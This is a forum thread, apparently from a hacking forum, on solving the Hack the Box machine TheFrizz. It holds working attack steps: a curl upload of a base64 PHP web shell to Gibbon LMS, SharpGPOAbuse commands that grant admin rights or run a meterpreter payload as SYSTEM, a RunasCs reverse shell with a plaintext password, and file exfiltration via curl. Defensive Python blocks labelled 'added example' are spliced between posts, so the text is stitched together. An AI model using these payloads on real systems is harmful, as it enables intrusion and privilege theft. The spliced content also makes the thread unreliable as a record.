TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
Guys, I was just wondering how you all got the schoolbus password. I found the 7z files but I couldn't download them or decompress them.
Reply
Thanks for the help! I managed to get everything up to the final root part. How many more attempts do we need to make?
Reply
I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...
Reply
(Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

One possible way is to schedule a task instead of adding the user as admin, for example, execute a task as "Administrator" that executes a meterpreter rev shell binary:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c C:\Windows\Temp\meterpreter.exe" --GPOName "New GPO" --Force
gpupdate /force

This will open a meterpreter session on your local machine as NT AUTHORITY/SYSTEM.
The same can be done with another rev shell.
Reply
(Mar 20, 2025, 03:07 AM)CYRUS_flame Wrote: Guys, I was just wondering how you all got the schoolbus password. I found the 7z files but I couldn't download them or decompress them.

I exfiltrated them via cURL to my attacker machine. I highly recommend moving them elsewhere on the box (I created C:\temp for my own purposes) and renaming the files, as the $ is interpreted by the CLI as a variable name. Use the uploadserver Python tool to receive them on the attacker machine.

(Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

It definitely breaks SSH if you disconnect after the attack is finished, but you can a) use RunasCs as schoolbus to execute whatever you need with elevated permissions (like throwing yourself a reverse shell) or, what I did, b) use the credentials to authenticate impacket's psexec module with the cmd option to get a System shell.
Reply
(Mar 15, 2025, 08:35 PM)Globules Wrote:
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=

Can someone tell me how this exploit was found from the USD advisory? Like how the payload was made? 'gibbonPersonID' isn't mentioned at all in it.
Reply
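The request quoted above works because the endpoint decodes whatever follows the comma in `img` and writes it to the caller-chosen `path`. As an added defensive illustration (not Gibbon's code, and not from the advisory), the handler below shows the checks a safe version of such a "save image from data URI" feature needs: verify the bytes really are the declared image type, let the server choose the extension, and confine the write to one directory. The upload directory and the sample inputs are constructed for the example.

```python
"""Hardened validation for a base64 "data URI" image save (added example)."""
import base64
import binascii
import re
from pathlib import Path

# Raster types the feature needs, with the magic bytes a real file starts with
# and the extension the server itself assigns (the client never picks it).
ALLOWED = {
    "image/png": (b"\x89PNG\r\n\x1a\n", ".png"),
    "image/jpeg": (b"\xff\xd8\xff", ".jpg"),
}
UPLOAD_DIR = Path("/var/www/uploads/rubrics")  # hypothetical, not Gibbon's layout

# "<mime>;<label>,<base64>", optionally with a leading "data:".
DATA_URI = re.compile(
    r"^(?:data:)?(?P<mime>[a-z]+/[a-z0-9.+-]+)(?:;[^,]*)?,(?P<b64>[A-Za-z0-9+/=]+)$"
)


class UploadRejected(ValueError):
    """Raised for any request the handler must not act on."""


def decode_image(field: str) -> tuple:
    """Return (mime, raw bytes) for a well-formed field, else raise."""
    m = DATA_URI.match(field.strip())
    if not m:
        raise UploadRejected("malformed image field")
    mime = m.group("mime")
    if mime not in ALLOWED:
        raise UploadRejected(f"unsupported type {mime}")
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except binascii.Error as exc:
        raise UploadRejected("invalid base64") from exc
    magic, _ = ALLOWED[mime]
    # The declared type is client-controlled; the bytes have to agree with it.
    if not raw.startswith(magic):
        raise UploadRejected("content does not match declared image type")
    return mime, raw


def safe_target(mime: str, requested_name: str) -> Path:
    """Map a client-supplied name to a path inside UPLOAD_DIR with a fixed
    image extension, discarding any directory components."""
    stem = Path(requested_name).stem  # "../../shell.php" -> "shell"
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        raise UploadRejected("bad file name")
    target = (UPLOAD_DIR / (stem + ALLOWED[mime][1])).resolve()
    if UPLOAD_DIR.resolve() not in target.parents:
        raise UploadRejected("path escapes upload directory")
    return target


def handle_upload(img_field: str, path_field: str) -> dict:
    """Validate a request; returns the decision instead of writing to disk."""
    try:
        mime, raw = decode_image(img_field)
        target = safe_target(mime, path_field)
    except UploadRejected as exc:
        return {"ok": False, "reason": str(exc), "path": None}
    return {"ok": True, "reason": "accepted", "path": str(target), "size": len(raw)}


# Constructed sample inputs: a minimal PNG-looking blob and a non-image blob.
SAMPLE_PNG_FIELD = "image/png;base64," + base64.b64encode(
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()
SAMPLE_TEXT_FIELD = "image/png;asdf," + base64.b64encode(b"this is not a png").decode()

if __name__ == "__main__":
    print(handle_upload(SAMPLE_PNG_FIELD, "rubric.png"))
    print(handle_upload(SAMPLE_TEXT_FIELD, "shell.php"))
```

Note that the check is on the decoded bytes, not on the `image/png` label: the label, the `;asdf` part and the file name are all attacker-controlled, and the original handler's mistake is trusting them.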
(Mar 20, 2025, 02:27 PM)jackpinto37 Wrote:
(Mar 20, 2025, 10:29 AM)FHP Wrote: I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

One possible way is to schedule a task instead of adding the user as admin, for example, execute a task as "Administrator" that executes a meterpreter rev shell binary:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c C:\Windows\Temp\meterpreter.exe" --GPOName "New GPO" --Force
gpupdate /force

This will open a meterpreter session on your local machine as NT AUTHORITY/SYSTEM.
The same can be done with another rev shell.

Thanks!
This is what I had tried many times without success... until I realized that I was using the Class_Frizz OU instead of Domain Controllers! I guess it would have required v.frizzle to be logged in to execute the task.
Reply
(Mar 20, 2025, 12:42 AM)bobthebuilder1111 Wrote:
(Mar 19, 2025, 10:50 PM)bkbk Wrote: Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO

Just worked for me...  Below are the steps someone else posted earlier which I just ran and worked flawlessly.
I guess the only other possibility is the binaries in question...
wget https://github.com/byronkg/SharpGPOAbuse...OAbuse.exe
wget https://github.com/antonioCoco/RunasCs/r...unasCs.zip (then used the RunasCs.exe from this zip)

# get root
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r IP:9001

That fixed it for me...
I was using a premade version of the exes at first, and when it didn't work I cloned the git and compiled my own, which still wasn't working...

Downloaded the links you posted and it worked with no issue, so the problem must've been how I compiled them.

Thanks for the links.
Reply
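Both GPO routes discussed in this thread (the immediate scheduled task and the local-admin membership change) leave the same trail on the domain controller: a new GPO gets linked to the Domain Controllers OU, and shortly afterwards either the local Administrators group changes or a scheduled task running as SYSTEM appears. The following detector is an added example from the defender's side, not code from any tool named above; it correlates those steps over constructed sample Security events using the standard event ids (5136 directory object modified, 4732 member added to a local group, 4698 scheduled task created). The event field names are the real ones, the timestamps, names and window are constructed.

```python
"""Correlate GPO-link changes on the DC OU with privileged effects (added example)."""
from datetime import datetime, timedelta

# Constructed sample Security events: (timestamp, event id, selected fields).
SAMPLE_EVENTS = [
    ("2025-03-20T09:00:00", 5136, {"ObjectDN": "OU=Class_Frizz,DC=frizz,DC=htb",
                                   "AttributeLDAPDisplayName": "gPLink",
                                   "SubjectUserName": "M.SchoolBus"}),
    ("2025-03-20T10:31:05", 5136, {"ObjectDN": "OU=Domain Controllers,DC=frizz,DC=htb",
                                   "AttributeLDAPDisplayName": "gPLink",
                                   "SubjectUserName": "M.SchoolBus"}),
    ("2025-03-20T10:33:40", 4732, {"TargetUserName": "Administrators",
                                   "MemberName": "CN=M.SchoolBus,CN=Users,DC=frizz,DC=htb",
                                   "SubjectUserName": "FRIZZDC$"}),
    ("2025-03-20T10:33:41", 4698, {"TaskName": "\\Update",
                                   "TaskContent": "<Principal><UserId>S-1-5-18</UserId>",
                                   "SubjectUserName": "FRIZZDC$"}),
    # Constructed benign change hours later, by an admin, with no GPO link edit.
    ("2025-03-20T14:00:00", 4732, {"TargetUserName": "Administrators",
                                   "MemberName": "CN=svc_backup,CN=Users,DC=frizz,DC=htb",
                                   "SubjectUserName": "Administrator"}),
]

DC_OU_PREFIX = "ou=domain controllers,"
WINDOW = timedelta(minutes=30)   # assumed: gpupdate applies well inside this
LOCAL_SYSTEM_SID = "S-1-5-18"


def _when(event):
    return datetime.fromisoformat(event[0])


def dc_gplink_changes(events):
    """5136 events that rewrite gPLink on the Domain Controllers OU."""
    return [e for e in events
            if e[1] == 5136
            and e[2].get("AttributeLDAPDisplayName", "").lower() == "gplink"
            and e[2].get("ObjectDN", "").lower().startswith(DC_OU_PREFIX)]


def privileged_effects(events):
    """The two outcomes the thread describes: a local Administrators membership
    change, or a scheduled task created to run as LocalSystem."""
    hits = []
    for e in events:
        f = e[2]
        if e[1] == 4732 and f.get("TargetUserName", "").lower() == "administrators":
            hits.append(e)
        elif e[1] == 4698 and LOCAL_SYSTEM_SID in f.get("TaskContent", ""):
            hits.append(e)
    return hits


def correlate(events, window=WINDOW):
    """Return alerts: one 'medium' per DC-OU gPLink change (rare and high-impact
    on its own) and one 'high' per privileged effect landing within `window`
    after such a change. The actor recorded is the account that edited gPLink,
    since the effect events are raised by the policy engine, not the attacker."""
    alerts = []
    for link in dc_gplink_changes(events):
        t0 = _when(link)
        actor = link[2].get("SubjectUserName")
        alerts.append({"severity": "medium", "event_id": 5136, "at": link[0],
                       "actor": actor,
                       "detail": "gPLink modified on Domain Controllers OU"})
        for eff in privileged_effects(events):
            delta = _when(eff) - t0
            if timedelta(0) <= delta <= window:
                subject = eff[2].get("MemberName") or eff[2].get("TaskName")
                alerts.append({"severity": "high", "event_id": eff[1], "at": eff[0],
                               "actor": actor,
                               "detail": f"{subject} {int(delta.total_seconds())}s "
                                         "after GPO link change"})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["severity"], a["event_id"], a["at"], a["actor"], a["detail"])
```

The Class_Frizz link in the sample produces nothing, which matches the thread: a policy linked to an OU that holds no logged-on target never applies, so it leaves no effect event on the DC; the 14:00 membership change is also ignored because no gPLink edit precedes it inside the window.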
(Mar 16, 2025, 06:16 PM)eyalzaba Wrote:
(Mar 16, 2025, 05:44 PM)Adith19051905 Wrote:
(Mar 16, 2025, 12:44 AM)nguyenhobbes2002 Wrote: krb5.conf

[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    proxiable = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

sudo ntpdate 10.10.11.60

getTGT.py frizz.htb/f.frizzle

export KRB5CCNAME=f.frizzle.ccache

ssh f.frizzle@10.10.11.60

This works for me.

I did everything right. Still this error. Hate this machine...

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information


It should work, when you ssh, try to use: ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@Frizz.htb

Jesus H ... been on this for days... finally got the SSH connection! Thanks a bunch!!
Reply
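The steps posted above fail for two common reasons that have nothing to do with the ticket itself: the client's clock is outside the KDC's tolerance (hence the ntpdate step), or the host name used for the SSH connection does not map to the realm through [domain_realm] (which is what the GSSAPITrustDNS hint is about, since an IP address has no such mapping). As an added example that is neither the thread's nor MIT Kerberos' code, the script below parses the posted krb5.conf, applies the [domain_realm] lookup rule (exact host first, then the longest dotted suffix), flags configuration mistakes, and checks clock skew against the MIT default of 300 seconds. The config text is the one posted in the thread, embedded as sample input.

```python
"""krb5.conf sanity checks: realm mapping and clock skew (added example)."""
import re
from datetime import datetime, timedelta, timezone

# The krb5.conf posted in the thread, embedded here as sample input.
SAMPLE_KRB5_CONF = """
[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    proxiable = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
"""

MAX_CLOCK_SKEW = timedelta(seconds=300)  # MIT Kerberos 'clockskew' default


def parse_krb5_conf(text):
    """Minimal parser for the section / key = value / key = { ... } layout."""
    sections, stack = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            stack = [sections.setdefault(header.group(1), {})]
            continue
        if line == "}":
            stack.pop()
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if value == "{":
            stack.append(stack[-1].setdefault(key, {}))
        else:
            stack[-1][key] = value
    return sections


def realm_for_host(conf, host):
    """Apply [domain_realm]: exact host first, then the longest '.suffix'."""
    mapping = {k.lower(): v for k, v in conf.get("domain_realm", {}).items()}
    host = host.lower().rstrip(".")
    if host in mapping:
        return mapping[host]
    labels = host.split(".")
    for i in range(1, len(labels)):
        suffix = "." + ".".join(labels[i:])
        if suffix in mapping:
            return mapping[suffix]
    return None  # no explicit mapping; an IP address always ends up here


def check_config(conf):
    """Return a list of problems that would make getTGT/ssh fail."""
    problems = []
    realm = conf.get("libdefaults", {}).get("default_realm")
    if not realm:
        problems.append("no default_realm")
    elif realm != realm.upper():
        problems.append("realm names are case-sensitive and conventionally upper-case")
    elif "kdc" not in conf.get("realms", {}).get(realm, {}):
        problems.append(f"no kdc defined for {realm}")
    for host, r in conf.get("domain_realm", {}).items():
        if r not in conf.get("realms", {}):
            problems.append(f"{host} maps to undefined realm {r}")
    return problems


def clock_skew_ok(client_time, kdc_time, limit=MAX_CLOCK_SKEW):
    """Kerberos rejects requests whose timestamp is further than `limit` from
    the KDC's clock, which is why the posted steps begin with ntpdate."""
    return abs(client_time - kdc_time) <= limit


if __name__ == "__main__":
    conf = parse_krb5_conf(SAMPLE_KRB5_CONF)
    print("problems:", check_config(conf))
    for h in ("frizzdc.frizz.htb", "Frizz.htb", "10.10.11.60"):
        print(h, "->", realm_for_host(conf, h))
```

With this config, `frizzdc.frizz.htb` and `frizz.htb` map to FRIZZ.HTB, while `10.10.11.60` maps to nothing: when SSH is pointed at the IP, the service principal GSSAPI asks for depends on DNS canonicalization of that address, so connecting by name (with the name resolvable, e.g. via /etc/hosts) is the more predictable choice.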
(Mar 20, 2025, 03:36 PM)PangPang Wrote:
(Mar 15, 2025, 08:35 PM)Globules Wrote:
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=

Can someone tell me how this exploit was found from the USD advisory? Like how the payload was made? 'gibbonPersonID' isn't mentioned at all in it.

usd-2023-0025 - usd HeroLab: it's mentioned here with a link to GitHub.
Reply